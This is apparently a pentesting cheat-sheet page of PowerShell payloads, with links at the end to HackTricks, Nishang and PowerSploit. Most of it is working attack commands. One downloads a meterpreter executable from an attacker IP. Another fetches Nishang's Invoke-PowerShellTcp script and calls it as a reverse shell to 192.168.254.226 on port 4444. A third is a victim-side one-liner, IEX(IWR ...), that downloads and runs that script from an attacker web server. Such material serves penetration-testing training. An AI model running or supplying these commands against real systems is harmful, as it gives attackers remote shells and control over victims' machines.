Powershell Payloads
Reverse shells and enumeration scripts
cURL
$URL="http://10.9.254.6/meterpreter.exe"
$Path="C:\Users\pentest\meterpreter.exe"
Invoke-WebRequest -URI $URL -OutFile $Path
Reverse Shell
curl https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 > rev.ps1
Add the following line at the end of the script to invoke the function, adjusting args...
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
Start a web server
python3 -m http.server
Download and exectute the powershell script from attacker web server (on victim machine)
powershell.exe (IEX(IWR http://10.10.14.5:8000/rev.ps1 -UseBasicParsing))
Projects
HackTricks
Nishang
Framework and collection of payloads for offensive security and pentesting
Powersploit
Project is no longer supported
Last updated
Was this helpful?